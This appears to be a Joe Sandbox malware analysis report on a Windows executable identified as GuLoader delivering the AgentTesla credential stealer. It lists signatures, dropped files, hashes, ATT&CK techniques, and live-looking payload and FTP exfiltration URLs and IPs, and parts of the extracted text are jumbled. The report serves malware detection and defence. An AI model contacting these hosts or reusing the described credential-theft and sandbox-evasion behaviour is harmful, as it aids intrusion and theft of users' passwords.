Generated by Joe Sandbox

ID: 638284Sample Name:ref002062022pago062022.exeCookbook: default.jbsTime: 16:43:36Date: 02/06/2022Version: 34.0.0 Boulder Opal

2444444444445555555556667788888899999

10

10111111111111111111111212121313131414141414141516161616171717

1717182020

Table of Contents

Table of ContentsWindows Analysis Report ref002062022pago062022.exe

OverviewGeneral InformationDetectionSignaturesClassification

Process TreeMalware Configuration

Threatname: GuLoaderYara Signatures

Memory DumpsSigma SignaturesSnort SignaturesJoe Sandbox Signatures

AV DetectionNetworkingData ObfuscationMalware Analysis System EvasionHIPS / PFW / Operating System Protection EvasionStealing of Sensitive InformationRemote Access Functionality

Mitre Att&ck MatrixBehavior GraphScreenshots

ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Domains and IPsContacted DomainsContacted URLsURLs from Memory and BinariesWorld Map of Contacted IPs

Public IPs

General InformationWarnings

SimulationsBehavior and APIs

Joe Sandbox View / ContextIPsDomainsASNsJA3 FingerprintsDropped Files

Created / dropped FilesC:\Users\user\AppData\Local\Temp\Ostentativt.ArnC:\Users\user\AppData\Local\Temp\TChinese.iniC:\Users\user\AppData\Local\Temp\datastrrelsens.Til5C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dllC:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.pngC:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl\Device\ConDrv

Static File InfoGeneralFile IconStatic PE Info

GeneralEntrypoint PreviewRich HeadersData DirectoriesSectionsResourcesImportsVersion InfosPossible Origin

Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS Queries

Copyright Joe Security LLC 2022 Page 2 of 26

20202021212121222222

2222

2222

2323

2323

232324242424

252525

262626

262626

26

DNS AnswersHTTP Request Dependency GraphHTTP Packets

StatisticsBehavior

System BehaviorAnalysis Process: ref002062022pago062022.exePID: 3504, Parent PID: 8512

GeneralFile ActivitiesRegistry Activities

Analysis Process: CasPol.exePID: 1664, Parent PID: 3504General




Analysis Process: CasPol.exePID: 1836, Parent PID: 3504GeneralFile Activities

File CreatedFile WrittenFile Read

Registry ActivitiesKey CreatedKey Value Created

Analysis Process: conhost.exePID: 1840, Parent PID: 1836GeneralFile Activities

Analysis Process: svchost.exePID: 1900, Parent PID: 888GeneralRegistry Activities

Disassembly


Windows Analysis Report ref002062022pago062022.exe

Overview

General Information

Sample Name:

ref002062022pago062022.exe

Analysis ID: 638284

MD5: 7500c0e8df88d1…

SHA1: 5e20971a917ceb…

SHA256: a4888274290402…

Infos:

Detection

AgentTesla,GuLoader

Score: 100

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Found malware configuration

Multi AV Scanner detection for subm…

Yara detected AgentTesla

Antivirus detection for URL or domain

Yara detected GuLoader

Tries to steal Mail credentials (via fi…

Writes to foreign memory regions

Tries to harvest and steal Putty / W…

Tries to detect Any.run

Tries to harvest and steal ftp login c…

Tries to detect sandboxes and other…

C2 URLs / IPs found in malware con…

Queries sensitive network adapter in…

Tries to harvest and steal browser in…

Queries sensitive BIOS Information…

Uses 32bit PE files

Queries the volume information (nam…

May sleep (evasive loops) to hinder…

Contains functionality to shutdown /…

Uses code obfuscation techniques (…

Internet Provider seen in connection…

Detected potential crypto function

Found potential string decryption / a…

Sample execution stops while proce…

Yara detected Credential Stealer

Contains functionality to call native …

Contains functionality to dynamicall…

Contains functionality for execution …

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / U…

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PE…

Uses a known web browser user age…

Checks if the current process is bei…

Classification

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious

System is w10x64native

ref002062022pago062022.exe (PID: 3504 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 7500C0E8DF88D12316724078FFBEEFAA)

CasPol.exe (PID: 1664 cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)





conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

svchost.exe (PID: 1900 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: F586835082F632DC8D9404D83BC16316)

cleanup

{ "Payload URL": "http://jmariecompany.com/Buhari0f_XGXisVNVRE198.bin"}

Source Rule Description Author Strings

00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp

JoeSecurity_GuLoader_2


Joe Security

00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp

JoeSecurity_AgentTesla_1


Joe Security

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Memory Dumps


AV Detection

Networking

Data Obfuscation

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp

JoeSecurity_CredentialStealer

Yara detected Credential Stealer

Joe Security

00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp

JoeSecurity_GuLoader_2


Joe Security

Process Memory Space: CasPol.exe PID: 1836 JoeSecurity_AgentTesla_1


Joe Security

Click to see the 1 entries

Source Rule Description Author Strings

⊘ No Sigma rule has matched

⊘ No Snort rule has matched

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

C2 URLs / IPs found in malware configuration


Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Writes to foreign memory regions


Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)


Remote Access Functionality

InitialAccess

Execution PersistencePrivilegeEscalation

DefenseEvasion

CredentialAccess

DiscoveryLateralMovement

Collection ExfiltrationCommandandControl

NetworkEffects

RemoteServiceEffects

Impact

ValidAccounts

2 1 1WindowsManagementInstrumentation

1DLL Side-Loading

1DLL Side-Loading

1Disable orModifyTools

2OSCredentialDumping

3File andDirectoryDiscovery

RemoteServices

1ArchiveCollectedData

ExfiltrationOver OtherNetworkMedium

1IngressToolTransfer

Eavesdropon InsecureNetworkCommunication

RemotelyTrackDeviceWithoutAuthorization

1SystemShutdown/Reboot

DefaultAccounts

1Native API

Boot orLogonInitialization Scripts

1AccessTokenManipulation

1Deobfuscate/DecodeFiles orInformation

1Credentialsin Registry

1 1 7SystemInformationDiscovery

RemoteDesktopProtocol

2Data fromLocalSystem

ExfiltrationOverBluetooth

1EncryptedChannel

Exploit SS7to RedirectPhoneCalls/SMS

RemotelyWipe DataWithoutAuthorization

DeviceLockout

DomainAccounts

At (Linux) LogonScript(Windows)

1 1 1ProcessInjection

2ObfuscatedFiles orInformation

SecurityAccountManager

3 3 1SecuritySoftwareDiscovery

SMB/Windows AdminShares

1EmailCollection

AutomatedExfiltration

2Non-ApplicationLayerProtocol

Exploit SS7to TrackDeviceLocation

ObtainDeviceCloudBackups

DeleteDeviceData

LocalAccounts

At(Windows)

LogonScript(Mac)

LogonScript(Mac)

1DLL Side-Loading

NTDS 1ProcessDiscovery

DistributedComponentObjectModel

1ClipboardData

ScheduledTransfer

1 1 2ApplicationLayerProtocol

SIM CardSwap

CarrierBillingFraud

CloudAccounts

Cron NetworkLogonScript

NetworkLogonScript

2 5 1Virtualization/SandboxEvasion

LSASecrets

2 5 1Virtualization/SandboxEvasion

SSH Keylogging DataTransferSize Limits

FallbackChannels

ManipulateDeviceCommunication

ManipulateApp StoreRankingsor Ratings

ReplicationThroughRemovableMedia

Launchd Rc.common

Rc.common

1AccessTokenManipulation

CachedDomainCredentials

1ApplicationWindowDiscovery

VNC GUI InputCapture

ExfiltrationOver C2Channel

MultibandCommunication

Jamming orDenial ofService

AbuseAccessibility Features

ExternalRemoteServices

ScheduledTask

StartupItems

StartupItems

1 1 1ProcessInjection

DCSync NetworkSniffing

WindowsRemoteManagement

Web PortalCapture

ExfiltrationOverAlternativeProtocol

CommonlyUsed Port

Rogue Wi-Fi AccessPoints

DataEncryptedfor Impact

Tries to harvest and steal ftp login credentials

Tries to harvest and steal browser information (history, passwords, etc)


Mitre Att&ck Matrix

Behavior Graph


Behavior Graph

ID: 638284

Sample: ref002062022pago062022.exe

Startdate: 02/06/2022

Architecture: WINDOWS

Score: 100

jmariecompany.com alighierieventos.com

Found malware configuration Antivirus detectionfor URL or domain

Multi AV Scanner detectionfor submitted file 4 other signatures

ref002062022pago062022.exe

2 22

started

C:\Users\user\AppData\Local\...\System.dll, PE32

dropped

Writes to foreign memoryregions Tries to detect Any.run

CasPol.exe

15 11

started

CasPol.exe

started

svchost.exe

started

3 other processes

jmariecompany.com

139.28.232.231, 49746, 80

DEDIPATH-LLCUS

Netherlands

Tries to harvest andsteal Putty / WinSCP

information (sessions,passwords, etc)

Tries to steal Mailcredentials (via file/ registry access)

Tries to harvest andsteal ftp login credentials 2 other signatures

conhost.exe

started

Queries sensitive networkadapter information

(via WMI, Win32_NetworkAdapter,often done to detect

virtual machines)

Queries sensitive BIOSInformation (via WMI,

Win32_Bios & Win32_BaseBoard,often done to detect

virtual machines)

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Screenshots

Thumbnails


Source Detection Scanner Label Link

ref002062022pago062022.exe 16% Virustotal Browse

ref002062022pago062022.exe 22% ReversingLabs Win32.Downloader.GuLoader


C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll 3% Metadefender Browse

C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll 0% ReversingLabs

⊘ No Antivirus matches

⊘ No Antivirus matches


https://api.ipify.org%t- 0% Avira URL Cloud safe

ftp://alighierieventos.com/buhari0f9ja 100% Avira URL Cloud malware

tVzYUP.com 0% Avira URL Cloud safe

127.0.0.1:HTTP/1.1 0% Avira URL Cloud safe

https://api.ipify.org%%startupfolder% 0% Avira URL Cloud safe

jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2 0% Avira URL Cloud safe

jmariecompany.com/Buhari0f_XGXisVNVRE198.bin 0% Avira URL Cloud safe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs


https://www.virustotal.com/gui/file/a488827429040238f86305283944e1429897f94e4f629cbbbdf8d42d74af1d1a/detection/f-a488827429040238f86305283944e1429897f94e4f629cbbbdf8d42d74af1d1a-1654166016

https://www.metadefender.com/#!/results/file/YnpJeU1EWXdNa3hHYkV4dU1qWlJhUTd2aWUxUWlKRw/regular/analysis

https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

0% Avira URL Cloud safe

DynDns.comDynDNSnamejidpasswordPsi/Psi 0% Avira URL Cloud safe

https://rPVMd8mXTm2hvq.com 0% Avira URL Cloud safe


Name IP Active Malicious Antivirus Detection Reputation

dual-a-0001.a-msedge.net 13.107.21.200 true false unknown

alighierieventos.com 50.31.177.39 true false unknown

jmariecompany.com 139.28.232.231 true true unknown

Name Malicious Antivirus Detection Reputation

jmariecompany.com/Buhari0f_XGXisVNVRE198.bin true Avira URL Cloud: safe unknown

Name Source Malicious Antivirus Detection Reputation

https://api.ipify.org%t- CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe low

ftp://alighierieventos.com/buhari0f9ja CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp

true Avira URL Cloud: malware unknown

tVzYUP.com CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp

false Avira URL Cloud: safe unknown

127.0.0.1:HTTP/1.1 CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp


https://api.ipify.org%%startupfolder% CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp


jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2CasPol.exe, 00000007.00000002.5725601189.0000000001546000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1098316376.000000000154C000.00000004.00000020.00020000.00000000.sdmp


nsis.sf.net/NSIS_ErrorError ref002062022pago062022.exe false high

schemas.xmlsoap.org/ws/2005/05/identity/claims/name

CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp

false high

https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp


DynDns.comDynDNSnamejidpasswordPsi/Psi CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp


https://rPVMd8mXTm2hvq.com CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1041975921.000000001C6D1000.00000004.00000020.00020000.00000000.sdmp


Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs


No. of IPs < 25%

25% < No. of IPs < 50%

50% < No. of IPs < 75%

75% < No. of IPs

IP Domain Country Flag ASN ASN Name Malicious

139.28.232.231 jmariecompany.com Netherlands 35913 DEDIPATH-LLCUS true

Joe Sandbox Version: 34.0.0 Boulder Opal

Analysis ID: 638284

Start date and time: 02/06/202216:43:36 2022-06-02 16:43:36 +02:00

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 14m 27s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: ref002062022pago062022.exe

Cookbook file name: default.jbs

Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301

Run name: Suspected Instruction Hammering

Number of analysed new started processes analysed:

37

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.troj.spyw.evad.winEXE@13/7@3/1

EGA Information: Successful, ratio: 100%

Public IPs

General Information


HDC Information: Successful, ratio: 18.5% (good quality ratio 18.1%)Quality average: 88.2%Quality standard deviation: 21.4%

HCA Information: Successful, ratio: 99%Number of executed functions: 0Number of non-executed functions: 0

Cookbook Comments: Found application associated with file extension: .exeAdjust boot timeEnable AMSI

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe,MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exeTCP Packets have been reduced to 100Excluded IPs from analysis (wh itelisted): 40.117.96.136, 13.107.5.88, 51.105.236.244, 51.124.57.242Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e-0009.e-msedge.net, arc.msn.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.comNot all processes where analyzed, report is missing behavior informationReport size exceeded maximum capacity and may have missing b ehavior information.Report size exceeded maximum capacity and may have missing d isassembly code.Report size getting too big, t oo many NtAllocateVirtualMemory calls found.Report size getting too big, t oo many NtOpenKeyEx calls found.Report size getting too big, t oo many NtProtectVirtualMemory calls found.Report size getting too big, t oo many NtQueryValueKey calls found.Report size getting too big, t oo many NtReadVirtualMemory ca lls found.Report size getting too big, t oo many NtSetInformationFile calls found.

Time Type Description

16:46:22 API Interceptor 2759x Sleep call for process: CasPol.exe modified

⊘ No context

⊘ No context

⊘ No context

⊘ No context

⊘ No context

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped FilesCopyright Joe Security LLC 2022 Page 11 of 26

Process: C:\Users\user\Desktop\ref002062022pago062022.exe

File Type: data

Category: dropped

Size (bytes): 84955

Entropy (8bit): 6.493773506936205

Encrypted: false

SSDEEP: 1536:+c+7NKOl3NFSGc4zKyxqBfoRio6XA5A/x8aveGlalwm:+c+b57Nc4Tqat2/xgl5

MD5: 7913F41BDE98D253E411ED6C39072084

SHA1: 0F278DD10891F54ED93490358D8E2962D7CB4446

SHA-256: E48696EE8CACBBF70AB01F8BCFA00887BC1F499233419BCFA9963AECE2F5F061

SHA-512: 3D32411E45A46C3526BDD3B92134DC67B8485F1A97FAE97CA0F7B67C4BA74925AC26003603019B44D04F34B0966AD6615F34F354E6259F8D88B21E62543435ED

Malicious: false

Reputation: low

Preview: ..............5...........................................................d.f....&#I.2......................................f........81.O.....................................................f.....f.........2...Ibbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb..s.f.a...f......)9q.<...............................................b.....f....#.FEo.........................................f.e....."NxA2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<...i...f.......i.*.LLLLLLLLLLLLLLLLLLLLLLLLL......f......r.&....f].................................t......4..2................................................................!...f................................f....c..e..r.a.$c,.l66666666666666666666666666666666..G.,...........f....-w..=...........................................v......j..r.?.1..*Z.............................................f....q...q.f.b.f...f...........nnnnnnnnnnnnnnnnnnnnnnnnnnn...o.......a.....+q.3L ....c......!5.!@.............................


File Type: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators

Category: dropped

Size (bytes): 2298

Entropy (8bit): 4.473680609114741

Encrypted: false

SSDEEP: 48:rL4i5ST3JO8HvYe6jj90Pb/wt2Btvtl3IoweHuK:rL4i52JhHvYe63CjtHv39d

MD5: 92F6C6E96B642FDFAE071A6522F8D23D

SHA1: 7ABB9950955094F3717E5CE55D6C4EE4C4AC9B61

SHA-256: F1156ACD8EE2349454B3C55917E19EF81DB3491B241658B99E6DAF628DEB9913

SHA-512: F3B3548E21CF1BDF47A1191880AE2D8122B1ADDB0E6B371EE3EA3D7D6F205B09213D15492086526D9F9EFC836CFBC880616B1D746B3C9C12F9144B6F9B77ADA0

Malicious: false

Reputation: low

Preview: ..[.T.r.a.n.s.l.a.t.i.o.n.s.].....R.O.G. .X.G. .M.o.b.i.l.e. .p.l.u.g.g.e.d.-.i.n. .=.#..c .R.O.G. .X.G. .o.:yaS.Y.c.v....P.u.s.h. .t.h.e. .".U.n.l.o.c.k. .S.w.i.t.c.h.". .o.n. .t.o.p. .o.f. .t.h.e. .p.l.u.g. .t.o. .l.o.c.k. .y.o.u.r. .c.a.b.l.e. .i.n. .p.l.a.c.e...=..R.c ."......". ..N.\vQ.V.[.0....D.o.n.'.t. .s.h.o.w. .t.h.i.s. .m.e.s.s.a.g.e. .a.g.a.i.n.=..N.Qo.:y....O.K.=.O.K.....C.a.n.c.e.l.=..S.m....A.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=._U.R .R.O.G. .X.G. .o.:yaS.Y.c.v....D.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.\P(u .R.O.G. .X.G. .o.:yaS.Y.c.v....C.l.i.c.k. .O.K. .t.o. .s.w.i.t.c.h. .t.o. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e...=...d .O.K. ..R.c. .R.O.G. .X.G. .o.:yaS.Y.c.v.0....C.l.i.c.k. .O.K. .t.o. .d.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.,. .a.n.d. .t.h.e.n. .s.a.f.e.l.y. .r.e.m.o.v.e. .t.h.e. .d.e.v.i.c.e...=...d .O.K. .\P(u .R.O.G. .X.G. .o.:yaS.Y.c.v&N.[hQ.yd..n..0....P.r.o.c.e.s.s.i.n.g.=.U..t-N....S.w.i.t.c.h. .t.o. .


File Type: ASCII text, with very long lines, with no line terminators

Category: dropped

Size (bytes): 19664

Entropy (8bit): 3.9986948974384626

Encrypted: false

SSDEEP: 384:LW5aeHlhv8r7DhA9znQeTRa1gOOFqV1+dHle6LCS+4ssqpM4XjqJZd:KQqRmXknmKFqV1SCSDZ4zqJZd

MD5: CCA75233F04853DE46ACFD473166211B

SHA1: D053CB686993FD4465B4ED47160675E05B76C96F

SHA-256: 85A665CE6DEBBF8D5FECE6BEF104A8DD0C5EA737DCF95C9F682298769E41ED5F

SHA-512: FD56C82A47E732B68EC5A0077A283921BCDB9B1450C8B04FFDD2768C7626E41009333B737CFC0E674231BE48043A92FE9F7DC9A10346A5BE41BE7CE9988A364C

Malicious: false

C:\Users\user\AppData\Local\Temp\Ostentativt.Arn

C:\Users\user\AppData\Local\Temp\TChinese.ini

C:\Users\user\AppData\Local\Temp\datastrrelsens.Til5


Preview: FD3DAA0B81D730D768491FC100A7158C21DFB8AFFF7D7C1D7CA584C1112FB48C6FED7C2C7F746C27EE3247226EDACC8AAB50E016B1FEB245D83045D47F36425600A2D5102334C8B3E91DA68E8E6C6AFD2F4D7A5E29B35D18CA2739E4B2B456EF872230EBC9B5DA6F2A487E11FFA6A71DEA278FF78B7CE55121B3E17ED249CD65A676177A369880C08793D3D7CC29CFEF2A873E8815DB5F2638088E5936B3E01182B0C17217709E620F7D77092DB02DE72651DBE054971CC0B370EEDC5B2582D233B91754604562EB914166ADAFBDC11945D9D972D41C37DF9E9759628EE0C8A5EF21D1338E98E4DAD6788B597A1BD7D40FF4562E87FBB0E00608A9057C416388B0BE73D3DF07FE9031097BFC21A000E61FB4FB22DE06399F059E18452DC25E826C234C052CDBB6E60A4325A4F5C6642C6656D5CD6D02BB78A4E5318F5C11408A1667B4D35FFCB43132D8DA53290E7E9184BEDB231841BDE63E98DB9F7B6A5F939664EB0481697514FC01DE0FF20B7FE6A3C09F329442245DA3A0967836BE72DA9EDAE5D7002A0682E36375D9749E1B5481913A276F9C6BFB0D745B64F170B8062E9CEBB1739E05D910D9C2BF7C8FA22E41F77D9860E7C5752EF48E441BE471E5396235F45270C510827EB32D0F2FBE83C40DA7DE1318E831BA13B7C847D19A2169B98041599D3A36B2381150C5A6BEA240CD6447


File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Category: dropped

Size (bytes): 12288

Entropy (8bit): 5.814115788739565

Encrypted: false

SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr

MD5: CFF85C549D536F651D4FB8387F1976F2

SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E

SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8

SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88

Malicious: false

Antivirus: Antivirus: Metadefender, Detection: 3%, BrowseAntivirus: ReversingLabs, Detection: 0%

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*[email protected][email protected][email protected]............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@[email protected].......*[email protected].......`.......,[email protected]................................................................................................................................................................................................................................................................................................................................................................................................


File Type: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced

Category: dropped

Size (bytes): 195

Entropy (8bit): 6.320143910674748

Encrypted: false

SSDEEP: 3:yionv//thPl9vt3lAnsrtxBll/V0MaYAWrsWm8uH4FTeBT3XLaKwrgpHIQ32kVU7:6v/lhPyskMaDsTuiSBTrar+IQ32k2VLp

MD5: CF42A428EB747F762D55241CFBE28294

SHA1: 6BE84AD9DD71A758407455F58ADEFF7567CD64AA

SHA-256: F27C644A9F71175C447D2C89186F9E88E26BBB30A9D0AB75F4FEF23A44F08C21

SHA-512: 5E92FA2A3B42A863B6D7DD57ADB0EEC4EB5BCAB2344558B456F3C27E9189A6DF6E844A7F628CFC0B494249F03B7F34BC28F8D49A4B5B6110CB488EE1BB001A68

Malicious: false

Preview: .PNG........IHDR................a....sBIT....|.d....zIDAT8..;..0.@.Â........nQ....).....E1..A!....y"..P.\..R.d..Q$..%.,..X.d.x.j. .D`.....Ep....rL8`..sP....d.)....H.k.{.?...5%Zy|N.....IEND.B`.

Process: C:\Windows\System32\svchost.exe

File Type: data

Category: dropped

Size (bytes): 12288

Entropy (8bit): 2.8128752827547734

Encrypted: false

SSDEEP: 96:lP2Ei0UR030i0E0U970Cl40k0U950Cl5090U990ClP0qD0U9H0ClgQ09G:tZk1vyIiPyWj6y6hqAyU3w

MD5: 5D7A3D8D2BEB69CF108F85C7F84F339A

SHA1: 1627D890DD5A3CE7FC5FA048840A45CD73F4C5F5

SHA-256: 443AD11610FFC666B82044B7EE96C9AA753C578F2B1D5376C40748B41DD2CE5C

SHA-512: A666B71B8DC7E399E9C1D5B70F0A77BD0C92DB6E62710BA06D09621FC446549C942FC2F4C911429D37DB15753D3AD9C770420C5B9365698946AA76D658DA2484

Malicious: false

C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll

C:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.png

C:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl


https://www.metadefender.com/#!/results/file/YnpJeU1EWXdNa3hHYkV4dU1qWlJhUTd2aWUxUWlKRw/regular/analysis

Preview: ....................................................!...............................l...........................bJ..........v..Zb....... [email protected].,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1............................................................-Y..v............E..v..........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.6.0.2._.1.5.5.2.0.3._.8.6.1...e.t.l.............P.P.....l.......................................................................8.B.........19041.1.amd64fre.vb_release.191206-1406.....5.@..........u.5.%Nb.f.};......WaaSMedicSvc.pdb....................................................................................................................................................................................................................................

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File Type: ASCII text, with CRLF line terminators

Category: dropped

Size (bytes): 30

Entropy (8bit): 3.964735178725505

Encrypted: false

SSDEEP: 3:IBVFBWAGRHneyy:ITqAGRHner

MD5: 9F754B47B351EF0FC32527B541420595

SHA1: 006C66220B33E98C725B73495FE97B3291CE14D9

SHA-256: 0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591

SHA-512: C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532

Malicious: false

Preview: NordVPN directory not found!..

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive

Entropy (8bit): 6.875472756643268

TrID: Win32 Executable (generic) a (10002005/4) 99.96%Generic Win/DOS Executable (2004/3) 0.02%DOS Executable Generic (2002/1) 0.02%Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%

File name: ref002062022pago062022.exe

File size: 275627

MD5: 7500c0e8df88d12316724078ffbeefaa

SHA1: 5e20971a917ceb5a29690584f893dc30f284956e

SHA256: a488827429040238f86305283944e1429897f94e4f629cbbbdf8d42d74af1d1a

SHA512: 576fc4e57315c610cac60d7d4c4a3b60d8048ced532bb7142c5e5a0b461a905dce374aa481b123be802a015d5f95658d8469d679c1ec94074d0e87ed00d6904c

SSDEEP: 6144:rbE/HU89oytSQlfP6YFqlMTva8/iEJcd39Y7:rbg9Z1xFqaT5/IdU

TLSH: 5744D052B700D1E7D772CB700C769FA65A69FC2386619E1723803B9F6CB3190DA2B5C5

File Content Preview:

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

Icon Hash: e0e8e8e8e0fae2e0

Entrypoint: 0x40352d
